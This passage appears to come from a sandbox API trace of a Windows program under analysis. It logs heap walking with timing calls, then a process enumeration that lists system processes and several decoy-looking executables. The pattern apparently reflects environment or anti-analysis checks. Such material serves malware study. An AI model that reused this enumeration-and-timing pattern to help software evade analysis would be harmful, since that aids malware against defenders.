(lphe=0x9f4efc0) returned 1 [0057.552] GetTickCount () returned 0x11db1a1 [0057.552] GetCurrentThreadId () returned 0x9e0 [0057.552] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.552] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.552] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.571] GetTickCount () returned 0x11db1c0 [0057.571] GetCurrentThreadId () returned 0x9e0 [0057.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.571] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.571] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.589] GetTickCount () returned 0x11db1cf [0057.589] GetCurrentThreadId () returned 0x9e0 [0057.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.589] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.607] GetTickCount () returned 0x11db1df [0057.607] GetCurrentThreadId () returned 0x9e0 [0057.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.607] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.607] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.626] GetTickCount () returned 0x11db1ef [0057.626] GetCurrentThreadId () returned 0x9e0 [0057.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.626] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.644] GetTickCount () returned 0x11db1fe [0057.644] GetCurrentThreadId () returned 0x9e0 [0057.644] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.644] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.644] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.662] GetTickCount () returned 0x11db20e [0057.662] GetCurrentThreadId () returned 0x9e0 [0057.663] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.663] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.663] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.681] GetTickCount () returned 0x11db22d [0057.681] GetCurrentThreadId () returned 0x9e0 [0057.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.681] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.681] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.699] GetTickCount () returned 0x11db23d [0057.699] GetCurrentThreadId () returned 0x9e0 [0057.700] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.700] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.700] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.719] GetTickCount () returned 0x11db24c [0057.719] GetCurrentThreadId () returned 0x9e0 [0057.719] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.719] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.719] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.738] GetTickCount () returned 0x11db25c [0057.738] GetCurrentThreadId () returned 0x9e0 [0057.738] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.738] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.738] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.756] GetTickCount () returned 0x11db26b [0057.756] GetCurrentThreadId () returned 0x9e0 [0057.756] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.756] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.756] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.774] GetTickCount () returned 0x11db28b [0057.774] GetCurrentThreadId () returned 0x9e0 [0057.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.775] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.775] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.793] GetTickCount () returned 0x11db29a [0057.793] GetCurrentThreadId () returned 0x9e0 [0057.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.793] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.811] GetTickCount () returned 0x11db2aa [0057.811] GetCurrentThreadId () returned 0x9e0 [0057.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.812] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.830] GetTickCount () returned 0x11db2b9 [0057.830] Heap32ListNext (hSnapshot=0x6f4, lphl=0x9f4f454) returned 1 [0057.830] GetTickCount () returned 0x11db2b9 [0057.830] GetTickCount () returned 0x11db2b9 [0057.830] Process32First (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0057.831] GetCurrentThreadId () returned 0x9e0 [0057.831] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.831] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.831] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0057.832] GetTickCount () returned 0x11db2b9 [0057.832] GetCurrentThreadId () returned 0x9e0 [0057.832] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.832] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.832] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0057.833] GetTickCount () returned 0x11db2b9 [0057.833] GetCurrentThreadId () returned 0x9e0 [0057.833] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.833] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.833] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.834] GetTickCount () returned 0x11db2b9 [0057.834] GetCurrentThreadId () returned 0x9e0 [0057.834] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.834] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.834] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0057.835] GetTickCount () returned 0x11db2b9 [0057.835] GetCurrentThreadId () returned 0x9e0 [0057.835] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.835] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.835] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.836] GetTickCount () returned 0x11db2c9 [0057.836] GetCurrentThreadId () returned 0x9e0 [0057.836] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.836] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.836] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0057.837] GetTickCount () returned 0x11db2c9 [0057.837] GetCurrentThreadId () returned 0x9e0 [0057.837] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.837] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.837] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0057.837] GetTickCount () returned 0x11db2c9 [0057.837] GetCurrentThreadId () returned 0x9e0 [0057.837] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.838] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.838] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0057.838] GetTickCount () returned 0x11db2c9 [0057.838] GetCurrentThreadId () returned 0x9e0 [0057.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.838] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.838] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0057.839] GetTickCount () returned 0x11db2c9 [0057.839] GetCurrentThreadId () returned 0x9e0 [0057.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.839] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.840] GetTickCount () returned 0x11db2c9 [0057.840] GetCurrentThreadId () returned 0x9e0 [0057.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.840] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.841] GetTickCount () returned 0x11db2c9 [0057.841] GetCurrentThreadId () returned 0x9e0 [0057.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.841] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.842] GetTickCount () returned 0x11db2c9 [0057.842] GetCurrentThreadId () returned 0x9e0 [0057.842] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.842] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.843] GetTickCount () returned 0x11db2c9 [0057.843] GetCurrentThreadId () returned 0x9e0 [0057.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.843] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.843] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.844] GetTickCount () returned 0x11db2c9 [0057.844] GetCurrentThreadId () returned 0x9e0 [0057.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.844] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0057.845] GetTickCount () returned 0x11db2c9 [0057.845] GetCurrentThreadId () returned 0x9e0 [0057.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.845] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.845] GetTickCount () returned 0x11db2c9 [0057.845] GetCurrentThreadId () returned 0x9e0 [0057.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.845] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.846] GetTickCount () returned 0x11db2c9 [0057.846] GetCurrentThreadId () returned 0x9e0 [0057.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.846] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0057.847] GetTickCount () returned 0x11db2c9 [0057.847] GetCurrentThreadId () returned 0x9e0 [0057.847] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.847] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0057.848] GetTickCount () returned 0x11db2c9 [0057.848] GetCurrentThreadId () returned 0x9e0 [0057.848] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.848] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0057.849] GetTickCount () returned 0x11db2c9 [0057.849] GetCurrentThreadId () returned 0x9e0 [0057.849] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.849] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.849] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0057.850] GetTickCount () returned 0x11db2c9 [0057.850] GetCurrentThreadId () returned 0x9e0 [0057.850] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.850] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.850] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.851] GetTickCount () returned 0x11db2d9 [0057.851] GetCurrentThreadId () returned 0x9e0 [0057.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.852] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0057.852] GetTickCount () returned 0x11db2d9 [0057.852] GetCurrentThreadId () returned 0x9e0 [0057.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.852] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0057.853] GetTickCount () returned 0x11db2d9 [0057.853] GetCurrentThreadId () returned 0x9e0 [0057.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.853] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="chairs.exe")) returned 1 [0057.854] GetTickCount () returned 0x11db2d9 [0057.854] GetCurrentThreadId () returned 0x9e0 [0057.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.854] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="im_disability.exe")) returned 1 [0057.855] GetTickCount () returned 0x11db2d9 [0057.855] GetCurrentThreadId () returned 0x9e0 [0057.855] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.855] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audi.exe")) returned 1 [0057.856] GetTickCount () returned 0x11db2d9 [0057.856] GetCurrentThreadId () returned 0x9e0 [0057.856] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.856] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eliminategeographylyrics.exe")) returned 1 [0057.857] GetTickCount () returned 0x11db2d9 [0057.857] GetCurrentThreadId () returned 0x9e0 [0057.857] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.857] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bay-antiques.exe")) returned 1 [0057.858] GetTickCount () returned 0x11db2d9 [0057.858] GetCurrentThreadId () returned 0x9e0 [0057.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.858] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="geneva minimal.exe")) returned 1 [0057.858] GetTickCount () returned 0x11db2d9 [0057.858] GetCurrentThreadId () returned 0x9e0 [0057.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.859] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="floating-illustrations.exe")) returned 1 [0057.859] GetTickCount () returned 0x11db2d9 [0057.859] GetCurrentThreadId () returned 0x9e0 [0057.859] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.859] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bizrate.exe")) returned 1 [0057.860] GetTickCount () returned 0x11db2d9 [0057.860] GetCurrentThreadId () returned 0x9e0 [0057.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.860] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tourist.exe")) returned 1 [0057.862] GetTickCount () returned 0x11db2d9 [0057.862] GetCurrentThreadId () returned 0x9e0 [0057.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.862] Process32Next (in: hSnapshot=0x6f4, lppe=0x9f4f258 | out: lppe=0x9f4f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blanket.exe")) returned 1 [0057.863] GetTickCount () returned 0x11db2d9 [0057.863] 